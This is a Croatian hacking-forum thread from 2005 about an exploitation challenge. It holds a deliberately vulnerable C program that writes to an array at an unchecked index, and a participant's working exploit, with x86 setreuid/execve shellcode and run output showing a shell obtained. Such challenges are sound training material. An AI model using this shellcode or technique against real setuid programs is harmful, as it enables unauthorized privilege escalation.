[es] - Zadatak za exploitanje 3 (extremno exploiitanje)

DownBload

Član broj: 1333
Poruke: 310
*.net.t-com.hr.

Profil

Zadatak za exploitanje 3 (extremno exploiitanje)

^{17.02.2005. u 23:31 - pre 233 meseci}

Evo jos jedan interesantan izazov za exploitanje koji se temelji na
dva manje poznata trika.

Code:

// Challenge #1 by Leon Juranic

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>

int buf[6]={0x41414141};
int fub[6]={0x41414141};

main (int argc, char **argv)
{
        int fd;
        long x, b = atoi(argv[2]);

        if ((fd = open(argv[1],O_RDONLY)) == -1)
                exit(-1);

        x = read (fd,buf,sizeof(buf));

        if (x>0) x/=4;

        printf ("%s\n",buf);

        buf[x] = b;

}

Leon Juranic

Odgovor na temu

glupi

Član broj: 836
Poruke: 199
*.cmu.carnet.hr.

Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{19.02.2005. u 14:42 - pre 233 meseci}

Pod pretpostavkom da je ovo suid program mogao bi citati bilo koji fajl pa tako i shadow, jest da nam je skracen buffer tako da se nece ispisat cijeli fajl, ali mozemo brejkat program pa procitat fd od shadowa, ili je nesto drugo u igri?

Odgovor na temu

DownBload

Član broj: 1333
Poruke: 310
*.net.t-com.hr.

Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{19.02.2005. u 15:43 - pre 233 meseci}

Citat:

glupi: Pod pretpostavkom da je ovo suid program mogao bi citati bilo koji fajl pa tako i shadow, jest da nam je skracen buffer tako da se nece ispisat cijeli fajl, ali mozemo brejkat program pa procitat fd od shadowa, ili je nesto drugo u igri?

Nenene...to je memory-related-bug i IMHO dosta je interesantan.

BTW: Izazov bi bio totalno glup da se radi o takvom citanju :-)))
BTW2: FD od shadowa ti nista ne znaci, jer ce uvijek biti 3 (stdin=0,stdout=1 i stderr=2)....no kao sto sam napomenuo ovaj izazov nema veze sa citanjem shadow fajla ili ostalih osjetljivih fajlova.

Pozdrav....

Leon Juranic

Odgovor na temu

EArthquake

Član broj: 20684
Poruke: 884
195.252.103.*

+67 Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{22.02.2005. u 23:04 - pre 233 meseci}

zaboravite da sam ista rekao
to je bilo u trenucima slabosti
doduse nisam mnogo napredovao u resenju
nikako mi ne ide u glavu zasto se x deli sa 4 (x/=4 )????

Odgovor na temu

glupi

Član broj: 836
Poruke: 199
*.cmu.carnet.hr.

Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{25.02.2005. u 22:05 - pre 233 meseci}

Vjerovatno zato da najdalje mozes prepisat fub[0] ili buf[6], makar to nema veze jer je fora ako sam shvatio da se kao argument readu posalje npr direktorij te ce read vratit -1 sto ce nam omogucit da prepisemo nesto ispred buf-a a to je p.0 sto je pointer na dtorse... Samo jos craftat exploit i to provest u djelo.

Odgovor na temu

glupi

Član broj: 836
Poruke: 199
*.cmu.carnet.hr.

Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{25.02.2005. u 22:42 - pre 233 meseci}

Ovo moze i ljepse...

Code:

#include <string.h>
#include <unistd.h>
#include <stdio.h>

char shellcode[]=       "\x89\xff\xff\xbf\x31\xc0\xb0\xa4\x31\xdb\x31\xc9\x31\xd2\x66\xbb\xf5\x01\x66\xb9\xf5\x01\x66\xba\xf5\x01\xcd\x80"
                        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
                        "\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42";

int main()
{
        char *env[3]={shellcode, NULL};
        char ebuf[]="/etc";

        int ret = 0xbffffffa - strlen(shellcode) - strlen("/home/hazard/develop/games/downchallen/2");

        printf("%d\n",ret);
        execle("/home/hazard/develop/games/downchallen/2","2", ebuf, "-1073741947", NULL, env);
        return 0;
}

Code:

[localhost downchallen]$ gcc ex.c -o ex; ./ex
-1073741947
bfffff85
-1
sh-2.05b$ exit

Odgovor na temu

DownBload

Član broj: 1333
Poruke: 310
*.net.t-com.hr.

Profil

Re: Zadatak za exploitanje 3 (extremno exploiitanje)

^{27.02.2005. u 20:22 - pre 233 meseci}

Da, to je to :-)

Leon Juranic

Odgovor na temu